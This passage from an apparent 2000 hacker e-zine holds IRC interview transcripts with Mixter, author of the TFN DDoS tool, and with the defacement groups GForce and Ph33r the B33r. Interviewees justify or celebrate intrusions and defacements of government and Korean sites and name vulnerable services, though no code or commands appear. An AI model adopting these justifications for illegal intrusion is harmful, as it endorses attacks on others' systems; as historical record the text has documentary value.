       Cruciphux [hwa@hwa-security.net] has left #intr []
      [suave(g@U????T.net)] yo whens the interview gonn a be released
      [msg(suave)] lol
      [msg(suave)] next issue
      [msg(suave)] should be a smash hit
      [suave(g@U????T.net)] awesome man it was agr8 interview i feel agood about it and it was kewl meeting u
      [msg(suave)] heh ok man
      [msg(suave)] it was funny
      [msg(suave)] cheers
      [suave(g@U????T.net)] whens it coming out btw
      [msg(suave)] not sure i'm kinda busy
      [suave(g@U?????T.net)] ok bro let us know k
      [msg(suave)] sure
      <Cruciphux> unbelievable man
      <Cruciphux> that was supposed to be an "interview"
      <Cruciphux> with guys from DeC
      <Cruciphux> they know shit
      <Cruciphux> couldnt answer simple questions
      <Cruciphux> scrolled ascii
      <Cruciphux> and just said shit like HWA IZ GAY AN WE IZ GR8
      <Cruciphux> rofl
      <Cruciphux> sigh
      <Cruciphux> sad
      <Cruciphux> totally
      <Cruciphux> two of em said two different names
      <Cruciphux> lol
      <Cruciphux> that was a hilarious interview
      <Cruciphux> gonna edit it now
      <Cruciphux> brb
      IRC log ended Tue Aug  1 17:06:24 2000
      
      ---END---
      
      Special thanks to jeemjones who pointed out they were taking the piss, I never would have 
      guessed all by myself tnx jj!, i put up with this drivel on occasion and sometimes even
      listen... who knows someone may say something intelligent one day.. </sarcasm>
      
      - Cruci
      
      @HWA            
      
325.0 [HWA] Interview: Mixter by Cruciphux (NOT SugarKing)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      (c) 2000 by HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript. Thanks
      
      Mailto: media@hwa-security.net
      
      
      Cruciphux/HWA
      
      Note: Originally published in HWA.hax0r.news issue #53
      http://welcome.to/HWA.hax0r.news
      
      Mixter <mixter@newyorkoffice.com>
      http://mixter.warrior2k.com/
      
      Cruciphux <Cruciphux@dok.org>
      http://welcome.to/HWA.hax0r.news/
      
      
      Mixter is the author of TFN (Tribe Flood Network) software which was
      recently brought into the limelight by Mafiaboy who used a variant called
      mstream to attack some big name web sites and effectively shut them down 
      for several hours.
      
      ->
      -> Technical Overview:
      ->
      -> See Packetstorm http://packetstorm.securify.com
      ->   http://packetstorm.securify.com/papers/unix/tfn.analysis.txt
      ->
      -> Analysis of the "Tribe Flood Network", or "TFN", by Mixter.
      -> TFN is a powerful distributed attack tool and backdoor currently
      -> being developed and tested on a large number of compromised
      -> Unix systems on the Internet.
      ->
      
      
      Sunday afternoon May 21st 2000.
      
      [ For the most part un-edited so you can decide what is ]
      [ interesting and what isn't, general chatter has been  ]
      [ removed and hostnames blanked out.                    ]
      
      
      ***** ADDENDUM/CORRECTION ***************************************************
      
      [ NOTE: I was incorrectly under the assumption at the time of this interview
      that Mafiaboy used Mixter's code to do his DDoS damage, this turned out to
      be false, in fact mstream (discussed elsewhere with source code) was used and
      NOT TFN. My apologies for the inaccuracies. - Cruciphux ]
      
      ******************************************************************************
      
      
      Session Start: Sun May 21 13:13:43 2000
      Session Ident: Mixter (mixter@*.net)
      [13:19] <Cruciphux> what inspired you to write the TFN software?
      [13:20] <Cruciphux> what where your goals, thoughts, intended uses
      [13:20] <Cruciphux> :
      [13:20] <Mixter> hmm
      [13:20] <Mixter> well, I coded it for the same purpose I code everything,
      because I simply like coding, and now or then you'll create something
      important
      [13:21] <Mixter> if not, coding something is always a new excercise for
      yourself...
      [13:21] <Cruciphux> you could code something but still not release it
      publically, was it merely POC or did you expect it to be used?
      [13:22] <Mixter> I've heard about these tools on irc like two years ago, at
      least that people wanted to create them
      [13:22] <Mixter> POC=? :)
      [13:22] <Mixter> sorry I spend way too little time in usenet etc.
      [13:22] <Cruciphux> Proof Of Concept
      [13:22] <Cruciphux> np
      [13:22] <Mixter> o
      [13:23] <Mixter> no, the first version was just a nice powerful tool to
      write up
      [13:23] <Cruciphux> what is your view on the Mafiaboy debacle and how do you
      feel about your software being used to attack major web sites?
      [13:24] <Mixter> it was interesting to see this concept worked, and you
      could contact hosts at a fast speed and with tunneling through raw packets
      and all
      [13:24] <Mixter> tfn2k, was however a pure POC.. any kiddie who tried to use
      it will know how buggy it is :)
      [13:25] <Cruciphux> can you explain the concept to us and how it works?
      [13:25] <Mixter> I think, when the government and media forces need
      something to puff out, they'll always find something
      [13:25] <Mixter> if it wasnt for the dos attacks, it wouldve been something
      else
      [13:26] <Mixter> I believe all packet kiddies out there should get a life...
      but they do more damage to irc servers and users than anything else, though
      [13:26] <Cruciphux> true but it was you that made the tool available, they
      may not otherwise have decided to attack these sites
      [13:27] <Cruciphux> do you feel responsible at all?
      [13:28] <Mixter> the plain concept of distributed attacks is to start
      processes from a lot of hosts, simple as that. in distributed packet
      flooding, you launch all processes against a single target. theoretically,
      before all the tools came out, when people just logged on to a lot of shells
      and run their udp/syn flooders against 1 target, that was the same stuff.
      what the new programs do, raw tunneling, or encrypted tcp control
      connections are just feature improvements to the same
      [13:28] <Mixter> that they have a big impact on feasibility and speed of
      distributed attacks and other things like distributed scanning
      [13:28] <Mixter> hm ok :)
      [13:29] <Mixter> its important to realize that the "authorities" biggest
      instrument is false guilt
      [13:30] <Mixter> people can't withdraw from it, and if they do, they're
      still being persecuted.. so I believe that people like mafiaboy arent
      innocent since they knew what they were doing, but simply sitting in front
      of your home computer and typing in commands can hardly make you a
      "criminal"
      [13:31] <Cruciphux> would you extend that view to "hacking" also?
      [13:31] <Cruciphux> whats your view on people who deface websites?
      [13:32] <Mixter> if you talk about hacking as in breaking into servers, I
      have no ethical problems with it as long as it is for the cause of improving
      the security, e.g. patching and/or notifying the people
      [13:33] <Cruciphux> so you are ok with non destructive intrusion so long as
      you patch the hole you came in through?
      [13:33] <Mixter> website defacements in general are destructive, because
      they can harm companies by destroying their images.. so it isnt something
      people should do.. exceptions are of course sites that stand for violation
      human and individual rights
      [13:33] <Cruciphux> what if the system is borrowed to say, host a bot on irc
      or launch further intrusion attempts?
      [13:34] <Cruciphux> yes I personally believe that socio-politcal defacements
      with a valid message are justifiable
      [13:34] <Mixter> well, I DONT recommend intrusion at all in these big
      brotherish times, it's far more easy to do productive, legal work, by
      working for a company or founding your own one, but lets say I have no
      problem with it, if no damage is created
      [13:35] <Cruciphux> what other software are you working on presently?
      [13:35] <Mixter> if they hack systems to host a bot, that's a pretty
      clueless and dangerous way... if they HAVE to intrude or if they dont have
      the small money, the only acceptable way is to contact the administration,
      notify them of the problem and ask for resources in exchange for securing
      their site
      [13:36] <Mixter> yeah.. it's pretty lame though, when you see some
      anti-human-rights site defaced, and you have in black on gray one line of
      text that says "pr0pz to muh brothers of the gibson h4xing cl4n"
      [13:36] <Mixter> ;/
      [13:37] <Cruciphux> considering the little cost involved in offering a
      hacker system resources in exchange for securing a server it seems strange
      it doesn't happen more often
      [13:37] <Mixter> well, security software, auditing software and more.. the
      problem is I can't disclose that without permission from my employees, and I
      wouldn't break my agreement
      [13:37] <Mixter> err employers
      [13:38] <Cruciphux> you currently are employed in the security field, were
      you ever a grey-hat?
      [13:38] <Cruciphux> i suppose thats a round about way of asking if you have
      hacked yourself in the past
      [13:38] <Mixter> yes it does.. but the whole thing is based on trust, and if
      it would become practice that hackers outline vulnerabilities and then get
      local access (from where they have LOTS of insider attacking possibilities),
      most people would have a problem trusting them
      [13:39] <Mixter> heh.. well yeah, I broke into hosts without permission in
      the past
      [13:39] <Cruciphux> trust is earned however and the notification of
      intrusion would be a demonstration of intent
      [13:39] <Mixter> at the beginning of my carreer, I started out with
      developing eggdrop/tcl (not for takeover, just for defense and fun for the
      most part)
      [13:39] <Cruciphux> how old are you?
      [13:40] <Mixter> that was 2 1/2 years ago.. I hadn't a clue about the legal
      issues back then, and wasn't even certain if what I was doing is illegal
      [13:42] <Mixter> ah, the notification of intrusion could also be used as a
      social engineering (<- stupid term :P) method, to get the trust, and then
      attack them from the inside with their consent :>
      [13:42] <Cruciphux> how did you get into computers? what was your intial
      exposure? first machine?
      [13:43] <Mixter> no, I don't care about that, after about 50 news agencies
      published name, address, birthdate, and photos of me back in february :P
      [13:43] <Cruciphux> k
      [13:45] <Cruciphux> how did you get into computers? what was your intial
      exposure? first machine?
      [13:46] <Mixter> my initial exposure was a c64 I used when I was about 6-8
      yrs old
      [13:46] <Mixter> i programmed a lot in basic, some machine language later :)
      [13:47] <Cruciphux> Are you self taught or do you have any official
      schooling in programming etc?
      [13:47] <Mixter> if people wouldnt all start with big PC OS's like windows,
      they'd probably figure out programming and the ins and outs of computing
      much better and faster...
      [13:47] <Cruciphux> yeah I started on a vic-20
      [13:47] <Cruciphux> wrote a bbs on it
      [13:47] <Cruciphux> it had 4k ram
      [13:47] <Mixter> oh well, the nice feds took away my computer back in 98
      [13:48] <Cruciphux> for what?
      [13:48] <Mixter> i hadnt had a pc for 3 months, that was when I read awful
      lots of programming, networking etc books and really got into the technical
      aspects
      [13:48] <Mixter> for installing some bots on a couple of hosts :]
      [13:48] <Cruciphux> *g*
      [13:49] <Cruciphux> thats about it really, thanks for yer time, any closing
      comments?
      [13:49] <Mixter> hey, nobody's perfect. I really *was* clueless about the
      tracing stealthing etc aspects of hacking, leave alone the legal stuff back
      then.. just exploring and doing anything I could :)
      [13:49] <Cruciphux> :-)
      [13:49] <Mixter> nope, if you dont have any closing questions ;)
      [13:49] <Cruciphux> when I sold my first c64 system, the guy that bought had
      nagged and nagged me
      [13:50] <Mixter> hehe
      [13:50] <Cruciphux> for some phreaking software i had, I finally gave in and
      let him have it warning him not to
      [13:50] <Cruciphux> actually use it unless he learned how it worked etc
      [13:50] <Cruciphux> he called me a week later
      [13:50] <Mixter> phreaking is something nice.. I really wish I could've done
      it in the time and/or country when it was feasible and not too dangerous
      [13:50] <Cruciphux> he was busted and had the $750 system confiscated
      [13:50] <Cruciphux> :)
      [13:51] <Mixter> aw :)
      [13:51] <Cruciphux> I was into it when I was younger
      [13:51] <Cruciphux> it was fun
      [13:51] <Mixter> i spent $3000 on my first PC
      [13:51] <Cruciphux> yeh same here
      [13:51] <Mixter> the one that got confiscated ;x
      [13:52] <Cruciphux> I paid $900 for a used 9M hard drive for my c64 bbs and
      $1000 for the USR 9600 external modem
      [13:52] <Cruciphux> heh
      [13:54] <Cruciphux> funny thinking about a 9 megabyte hard disk these days,
      it was the size of a ups
      [13:55] <Cruciphux> actually it might have been 7M
      [13:55] <Cruciphux> anyways we're all done i'll ttyl - thanks
      Session Close: Sun May 21 13:55:44 2000
            
      END
      
      @HWA            
      
 326.0 [HWA] Interview: back to business, political hackers GForce by SugarKing      
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
        You have seen the high profile sites on Attrition that have been
        defaced by GForce, SugarKing from HWA Staff interviews GForce
        members for a closer look into why they do it.
            
        (c) 2000 by SugarKing/HWA-Security
        please credit http://hwa-security.net
        as source if you use any part or all of this
        transcript. Thanks
        
        Mailto: media@hwa-security.net
      
        Cruciphux/HWA
      
      [ Session Start - slightly edited ]
             
      [20:59] <sniper-> SugarKing: So we can start the interview ;)
      [20:59] <sniper-> sure
      [20:59] <SugarKing> alright, is this everyone you want present?
      [21:00] <sniper-> yes, most of other guy's arn't on, some are busy, and it's very early here.
      [21:00] <SugarKing> yeah
      [21:01] <SugarKing> ok, you don't have to answer any question if you don't want to...
      [21:01] <sniper-> ok
      [21:02] <SugarKing> so lets begin:)
      [21:02] <sniper-> yep
      [21:02] <SugarKing> ok first off, how many members are there, and who are they?
      [21:03] *** sniper- is now known as sniper__
      [21:03] <rave-> ehehe
      [21:03] <SugarKing> heh
      [21:03] <rave-> services sux
      [21:03] <sniper__> There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm
      [21:03] <SugarKing> ok
      [21:04] <SugarKing> when was the group founded and by who?
      [21:04] <sniper__> It's was founded about a year ago, and by myself, heataz and miller
      [21:05] <SugarKing> what was your sole purpose of starting the group? for the reasons you name in your defacments?
      [21:06] <sniper__> GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir
      [21:06] <sniper__> t was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the formation of the group was to create global awareness about kashmir.
      [21:06] <SugarKing> which members are actually from Pakistan?
      [21:07] <SugarKing> if any
      [21:07] <sniper__> we focus on kashmir, basically.
      [21:07] <SugarKing> so nobody is actually from kashmir?
      [21:07] <sniper__> well i`m from pakistan, othger's would like to stay anonymous please.
      [21:08] <sniper__> well no one if from kashmir.
      [21:08] <SugarKing> sure, np
      [21:08] <sniper__> =)
      [21:08] <SugarKing> some of your defacements are gov servers, any reason of targeting gov's, are you afraid to get busted?
      [21:09] <sniper__> Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;)
      [21:10] <SugarKing> yeah of course
      [21:11] <SugarKing> you are one of, if not the only, people on attrition that I've seen that actually have a REASON
      [21:11] <SugarKing> instead of just "I 0wn j00"
      [21:11] <rave-> :)
      [21:11] *** snipah- (**************) has joined #gforce
      [21:11] <snipah-> sory i got disconnected.
      [21:11] <snipah-> US government was targetted because 1) more people view .gov's and we can do a good job in achieving th goal, we are out for. 2) We're a big angry :)
      [21:12] <snipah-> big=bit
      [21:12] *** sp1n sets mode: +o snipah-
      [21:12] <SugarKing> and it seems like you guys got some skill, seeing you don't really do any NT hacks
      [21:12] *** rpcb1nd (***************) has joined #gforce
      [21:12] *** sk0l (*****************) has joined #gforce
      [21:12] *** sp1n sets mode: +o rpcb1nd
      [21:12] *** sp1n sets mode: +o sk0l
      [21:13] <snipah-> i`m glad we don't do NT,
      [21:13] <snipah-> we are supported by a study group known as hexa labs
      [21:13] <SugarKing> what is hexa labs
      [21:13] <SugarKing> ?
      [21:13] <snipah-> Plus every member can code (usefully)
      [21:14] <snipah-> hexa labs is a study group, they find out vulnerabilities, code them (we help code)
      [21:14] <snipah-> most of it is being kept private.
      [21:14] *** sniper__ has quit IRC (Ping timeout)
      [21:14] <SugarKing> you guys ever use your own exploits when using them on defacing?
      [21:15] *** sk0l sets mode: +l 14
      [21:16] [rave-:#gforce PING]
      [21:16] <rave-> ehhe
      [21:16] <rave-> alot of times we use own exploitz
      [21:16] <SugarKing> heh
      [21:17] <rave-> sometimes we use a wuftp (b0f rulz) and bind.. but no details
      [21:17] <SugarKing> yeah b0f rules
      [21:17] <rave-> :)
      [21:17] <rave-> :)
      [21:17] <SugarKing> what do you guys think about ./hack kiddies on attrition like the Crime Boys?
      [21:18] *** snipah- has quit IRC (Ping timeout)
      [21:18] <rave-> oh
      [21:18] <rave-> we dont apreciate it, we think about just kids who dont know what to do.
      [21:19] <rave-> who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something
      [21:19] <rave-> we think about computer security is a big culture and need to dedicate to it, studys, tests, and fucking blowing head
      [21:19] <rave-> eheh
      [21:20] <rave-> crimeboys is very poor
      [21:20] <rave-> NT hackewrs
      [21:20] <SugarKing> yeah I agree
      [21:20] <SugarKing> are most of you guys teengagers?
      [21:21] <rave-> i dunno about sniper but i have 20 yrs old
      [21:22] *** sniper__ (***************) has joined #gforce
      [21:22] <SugarKing> wb
      [21:22] *** rave- sets mode: +o sniper__
      [21:22] <sniper__> thx
      [21:22] <SugarKing> so why do you think India is solely responisible for this ordeal in Kashmir?
      [21:24] *** rpcb1nd sets mode: +l 13
      [21:24] <sniper__> because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights
      [21:25] *** sp1n sets mode: +l 14
      [21:26] <SugarKing> nod
      [21:26] <SugarKing> pretty violent
      [21:27] <sniper__> yep.
      [21:27] <SugarKing> you guys plan on keep defacing and protesting till someone gets busted?
      [21:28] <sniper__> not sure, but yes we will be defacing for some while. ;)
      [21:28] <SugarKing> what do plan on accomplishing by defacing on this issue?
      [21:29] <SugarKing> to get people to realize the situation ?
      [21:29] <sniper__> yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =)
      [21:30] <sniper__> obviously they 'kashmir' is some guy
      [21:30] <SugarKing> hahah
      [21:31] <sniper__> they thought even.
      [21:31] <SugarKing> any last comments/shout outs?:)
      [21:32] <sniper__> =]
      [21:33] <sniper__> yes
      [21:34] <SugarKing> shoot:)\
      [21:35] <sniper__> I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex
      [21:35] <sniper__> oh and #darknet@efnet ;)
      [21:36] <sniper__> last shouts to hwa security ;)
      [21:37] <SugarKing> hah nice, thanks for the interview:)
      [21:37] <sniper__> ah, np
      [21:39] [rave-:#gforce PING]
      
      END
      
      @HWA      

327.0 [HWA] Interview: Ph33r the B33r by SugarKing
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      (c) 2000 by SugarKing/HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript. Thanks
      
      Mailto: media@hwa-security.net
      
      
      Cruciphux/HWA
      
      Note: Originally published in HWA.hax0r.news issue #53
      http://welcome.to/HWA.hax0r.news
      
      Exclusive interview by HWA staff writer SugarKing
      Contact him at: sugaking@gis.net
      Or editor at: cruciphux@dok.org
      
      
      
       Session Start: Thu May 04 21:15:55 2000
       [21:15] *** Now talking in #vivalaresistance
       [21:16] <p4ntera> lets do this
       [21:16] <SugarKing> lock the channel
       [21:16] <p4ntera> no one knows of it
       [21:16] <p4ntera> i cant
       [21:16] <p4ntera> lol
       [21:16] <SugarKing> ok
       [21:16] <SugarKing> heh
       [21:16] <SugarKing> one sec bro
       [21:16] <p4ntera> werd
       [21:16] <SugarKing> talking to a chick on the phone:)
       [21:17] <p4ntera> heh
       [21:17] <p4ntera> hurry mon aint got much time
       [21:17] <SugarKing> alright
       [21:17] <SugarKing> logging now
       [21:17] <SugarKing> aight
       [21:17] <SugarKing> you guys don't have to answer anything
       [21:17] <SugarKing> just say no comment:)
       [21:17] <p4ntera> iight
       <SNIP>
       [21:17] <p4ntera> wtf
       [21:17] <SugarKing> heh
       [21:18] <Da_Pest> Whats up?
       [21:18] <Da_Pest> Yo we gonna start?
       [21:18] <SugarKing> so how long has ph33r the b33r been a group?
       [21:18] <SugarKing> we're already starting:)
       [21:18] <p4ntera> well
       [21:18] <Da_Pest> Ok : )
       [21:18] <p4ntera> i recruited people from the early october
       [21:18] <p4ntera> so lets say october
       [21:18] <SugarKing> ok...
       [21:18] <Da_Pest> I joined probably in december or november
       [21:18] <Da_Pest> Which one was it p4ntera?
       [21:18] <p4ntera> november
       [21:19] <Da_Pest> k
       [21:19] <SugarKing> so you started the group, p4ntera?
       [21:19] <p4ntera> yes
       [21:19] <SugarKing> any reason?
       [21:19] <p4ntera> well
       [21:19] <SugarKing> and what's with the name?
       [21:19] <p4ntera> because there wasn't much action going around in the underground
       [21:19] <Da_Pest> LoL
       [21:19] <Da_Pest> that name is joax
       [21:19] <p4ntera> so
       [21:19] <p4ntera> i wanted people to know the "scene" aint dead
       [21:19] <p4ntera> the name?
       [21:19] <p4ntera> lmao
       [21:19] <p4ntera> well its a LONNNG story
       [21:20] <Da_Pest> Very long
       [21:20] <SugarKing> heh
       [21:20] <p4ntera> yeah
       [21:20] <Da_Pest> he told me once
       [21:20] <Da_Pest> Dont wanna hear it again
       [21:20] <p4ntera> u still wanna hear it?
       [21:20] <SugarKing> nah that's ok
       [21:20] <SugarKing> save some time
       [21:20] <p4ntera> yeah
       [21:20] <SugarKing> so how many members to date?
       [21:20] <p4ntera> holy shit
       [21:20] <p4ntera> loll
       [21:20] <p4ntera> 14+
       [21:20] <Da_Pest> 15?
       [21:20] <p4ntera> most are just shadow members
       [21:20] <p4ntera> who remain in the background
       [21:20] <Da_Pest> Yah
       [21:21] <Da_Pest> Wait let me think
       [21:21] <Da_Pest> Yah 15 or 16 i can remember
       [21:21] <SugarKing> that's alot
       [21:21] <p4ntera> yeah
       [21:21] <SugarKing> u guys know how many sites you've defaced so far?
       [21:21] <p4ntera> next?
       [21:21] <p4ntera> another holy shit =)
       [21:21] <p4ntera> i would say 20+
       [21:21] <Da_Pest> LoL
       [21:21] <SugarKing> or don't keep count?
       [21:21] <SugarKing> 20+?
       [21:21] <p4ntera> yeah
       [21:21] <SugarKing> I would say 40
       [21:22] <Da_Pest> And many more to come
       [21:22] <SugarKing> just guessing
       [21:22] <SugarKing> heh
       [21:22] <p4ntera> well
       [21:22] <p4ntera> i dont wanna sound cocky
       [21:22] <p4ntera> =)
       [21:22] <SugarKing> why do you guys deface? fame?
       [21:22] <p4ntera> nah
       [21:22] <p4ntera> well i like to show people the underground aint dead
       [21:22] <p4ntera> and well
       [21:22] <p4ntera> some for fame too
       [21:22] <p4ntera> but not all
       [21:23] <SugarKing> what do you mean "the underground aint dead"?
       [21:23] <Da_Pest> Yah i agree
       [21:23] <p4ntera> hence why we havent defaced the higher up sites
       [21:23] <p4ntera> well
       [21:23] <p4ntera> look on attrition
       [21:23] <p4ntera> mostly frontpage kiddies, or brazilian kids who cant speak
       [21:23] <p4ntera> english
       [21:23] <p4ntera> or both
       [21:23] <SugarKing> hah ya
       [21:23] <Da_Pest> MSADC GALORE
       [21:23] <p4ntera> i say the 2 go together in the same sentence
       [21:23] <Da_Pest> HAHA
       [21:23] <p4ntera> da_pest, dont even give em that =)
       [21:23] <Da_Pest> lol
       [21:23] <Da_Pest> Tru dat
       [21:24] <SugarKing> hah
       [21:24] <p4ntera> next?
       [21:24] <SugarKing> you guys afraid of being busted?
       [21:24] <p4ntera> hell yeah
       [21:24] <Da_Pest> Of course
       [21:24] <p4ntera> i dont wanna have a friend named backdoor billy
       [21:24] <SugarKing> then why do you keep defacing?
       [21:24] <p4ntera> well
       [21:24] <Da_Pest> You think i want bull shit on my record lol
       [21:24] <p4ntera> we're in it now
       [21:24] <p4ntera> we can't stop
       [21:24] <p4ntera> plus i dont wanna
       [21:25] <SugarKing> ya you can
       [21:25] <SugarKing> I did
       [21:25] <SugarKing> don't wanna? why?
       [21:25] <p4ntera> i cover my tracks well, and i hide myself
       [21:25] <p4ntera> i like defacing
       [21:25] <Da_Pest> Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught
       [21:25] <Da_Pest> same
       [21:25] <Da_Pest> :)
       [21:25] <p4ntera> hes right
       [21:25] <SugarKing> what about ethics? 
       [21:25] <p4ntera> well
       [21:25] <SugarKing> i did it for awhile
       [21:25] <p4ntera> i rarely do medical sites
       [21:26] <SugarKing> but i don't think it's right
       [21:26] <SugarKing> not needed
       [21:26] <p4ntera> no msadc
       [21:26] <SugarKing> eh
       [21:26] <SugarKing> heh
       [21:26] <p4ntera> and usually if i feel sorry for the admin
       [21:26] <p4ntera> i give him the patch
       [21:26] <SugarKing> if you feel sorry?
       [21:26] <Da_Pest> I think its safe to say NT will be out of PTB for a bit eh p4ntera?
       [21:26] <SugarKing> haha
       [21:26] <p4ntera> thats right
       [21:26] <p4ntera> but now we're going for countries
       [21:27] <Da_Pest> Oh yah
       [21:27] <SugarKing> countries?
       [21:27] <p4ntera> as you might have saw, we raped korea pretty bad
       [21:27] <p4ntera> =)
       [21:27] <SugarKing> ya i noticed a bit
       [21:27] <p4ntera> yeah
       [21:27] <Da_Pest> Yah'
       [21:27] <p4ntera> next is a country that everyone hates
       [21:27] <p4ntera> we plan to finish it up tommorow (korean sites that is)
       [21:27] <Da_Pest> Yah
       [21:28] <SugarKing> what about others calling you guys script kiddies and indeed having script kiddies as members
       [21:28] <Da_Pest> We gonna clean up the .kr tomorow eh p4ntera?
       [21:28] <p4ntera> well
       [21:28] <SugarKing> not to name any *cough*artech*cough*
       [21:28] <SugarKing> :)
       [21:28] <p4ntera> lets not get into artech
       [21:28] <Da_Pest> Ok artech
       [21:28] <Da_Pest> I d liek to say something about him
       [21:28] <p4ntera> i consider a script kiddie someone who uses scripts and not knows what it actually does
       [21:28] <Da_Pest> sorry like
       [21:28] <SugarKing> go ahead:)
       [21:28] <Da_Pest> Ok
       [21:28] <Da_Pest> He is basically a frontpage KIDDY
       [21:28] <p4ntera> yeah
       [21:29] <SugarKing> yeah I noticed
       [21:29] <SugarKing> aol kiddie
       [21:29] <p4ntera> he doesnt even know what NTLM authentication is
       [21:29] <p4ntera> or
       [21:29] <p4ntera> how he uses the everyone/guest group to hack with frontpage
       [21:29] <p4ntera> he just randomly tries sites
       [21:29] <Da_Pest> He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage
       [21:29] <p4ntera> which is pretty fucking lame
       [21:29] <Da_Pest> Ok
       [21:29] <Da_Pest> Go on attrition
       [21:29] <Da_Pest> and look at his hacks
       [21:29] <Da_Pest> Im pretty sure every one of them is NT
       [21:29] <p4ntera> nah thats not important
       [21:29] <SugarKing> yeah they are
       [21:29] <p4ntera> lets move on to something else
       [21:29] <SugarKing> i don't think he knows what linux is
       [21:30] <p4ntera> NT can be raped other ways
       [21:30] <Da_Pest> Yah
       [21:30] <p4ntera> as u saw with what i did
       [21:30] <Da_Pest> But he uses only frontpage
       [21:30] <SugarKing> yeah 
       [21:30] <Da_Pest> Yep
       [21:30] <p4ntera> that is correct
       [21:30] <SugarKing> how many memebers code?
       [21:30] <p4ntera> netbios is a weak fucking protocol
       [21:30] <p4ntera> well
       [21:30] <Da_Pest> LoL
       [21:30] <p4ntera> 5-8
       [21:30] <Da_Pest> Very very weak
       [21:30] <SugarKing> you guys plan on releasing any exploits you may have written?
       [21:30] <p4ntera> yeas
       [21:30] <p4ntera> very soon
       [21:30] <Da_Pest> Yep
       [21:30] <p4ntera> we are probably gonna release some scanners
       [21:30] <p4ntera> then maybe some exploits
       [21:30] <Da_Pest> Yeah
       [21:30] <SugarKing> cool
       [21:31] <p4ntera> depends how much sexor i get in the next few days
       [21:31] <SugarKing> hah
       [21:31] <Da_Pest> LoL
       [21:31] <Da_Pest> You know ill be getting sex0r from 3r1/\/ lol
       [21:31] <SugarKing> so all members are generally kids? 15-18?
       [21:31] <p4ntera> yeah muthafuckas
       [21:31] <p4ntera> =)
       [21:31] <p4ntera> no
       [21:31] <Da_Pest> lol 
       [21:31] <p4ntera> we have some universty members
       [21:31] <p4ntera> but none too old
       [21:31] <p4ntera> none too young
       [21:31] <SugarKing> oh
       [21:31] <p4ntera> around your difference
       [21:31] <p4ntera> as u said
       [21:32] <SugarKing> what are you guys trying to prove by defacing?
       [21:32] <SugarKing> anything?
       [21:32] <p4ntera> like i said
       [21:32] <p4ntera> the underground aint dead
       [21:32] <p4ntera> and
       [21:32] <p4ntera> that we, as kids, will not take the bullshit the media spews forth
       [21:32] <p4ntera> about hackers and the like
       [21:32] <SugarKing> yeah
       [21:33] <Da_Pest> Yep
       [21:33] <SugarKing> hmm
       [21:33] <Da_Pest> I dont like the stereo types
       [21:33] <SugarKing> do you guys have a site?
       [21:33] <p4ntera> not yet
       [21:33] <p4ntera> we will have one, one of our members needs 2 way cable
       [21:33] <p4ntera> :P
       [21:33] <p4ntera> www.b33r.com soon
       [21:33] <SugarKing> heheh cool
       [21:33] <Da_Pest> Plus we dont even really need one as of this monet
       [21:34] <Da_Pest> moment
       [21:34] <SugarKing> ya
       [21:34] <Da_Pest> errr.....
       [21:34] <SugarKing> do you guys plan on ever stop defacing?
       [21:34] <Da_Pest> Me No!
       [21:34] <Da_Pest> Well not for a while at least
       [21:35] <SugarKing> p4ntera?
       [21:35] <Da_Pest> He is afk
       [21:35] <SugarKing> oh
       [21:35] <Da_Pest> he is walkin his dog for a sec
       [21:35] <SugarKing> hah ok
       [21:35] <Da_Pest> He will brb
       [21:35] <Da_Pest> :)
       [21:35] <SugarKing> i hate dogs
       [21:35] <SugarKing> they're Pest's:P
       [21:35] <Da_Pest> Why?
       [21:35] <Da_Pest> Like me : )
       [21:35] <SugarKing> ya
       [21:36] <Da_Pest> I lub puppys
       [21:36] <Da_Pest> :)
       [21:36] <Da_Pest> U gots any other questions?
       [21:36] <SugarKing> ya, i'm waiting for p4ntera though
       [21:36] <Da_Pest> Oh ok
       [21:37] *** p4ntera has quit IRC (Ping timeout)
       [21:37] <SugarKing> hrm
       [21:37] <SugarKing> he'll be back
       [21:38] <Da_Pest> Yah
       [21:38] <SugarKing> so do you use different handles on IRC because you're afraid of getting caught?
       [21:38] <Da_Pest> Not so much getting caught just the fact i dont want to be bothered
       [21:39] <Da_Pest> I dont want some kid to see my defacements and bug me on irc
       [21:39] <SugarKing> ya
       [21:39] <SugarKing> how'd you meet p4ntera?
       [21:39] <Da_Pest> but partly because of the illegal activities factor =
       [21:39] <Da_Pest> Honestly we live about a few blocks away from eachother
       [21:40] <SugarKing> hah cool
       [21:40] <Da_Pest> Yah
       [21:40] <SugarKing> do you guys talk about your defacements and shit in school?
       [21:41] <Da_Pest> Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda
       [21:41] <Da_Pest> Shit sorry for my spelling
       [21:41] <Da_Pest> Im just really cold 
       [21:41] <SugarKing> do your friends know that you guys are into computers?
       [21:41] <SugarKing> heh
       [21:41] <SugarKing> it's aight
       [21:42] <Da_Pest> Umm... Well some do but I dont think any know im into defacing
       [21:42] <Da_Pest> Me and p4ntera are the only ones out of my cru that are into this shit
       [21:42] <SugarKing> ya
       [21:43] <SugarKing> same as me and Clientel
       [21:43] <Da_Pest> cool
       [21:43] <SugarKing> we have one class together and he doesn't shut the hell up
       [21:43] <Da_Pest> LoL
       [21:43] <Da_Pest> What does he talk about?
       [21:44] <SugarKing> about his elite defacements
       [21:44] <SugarKing> haha nah
       [21:44] <Da_Pest> brb man im gonna log on a nother server im lagged
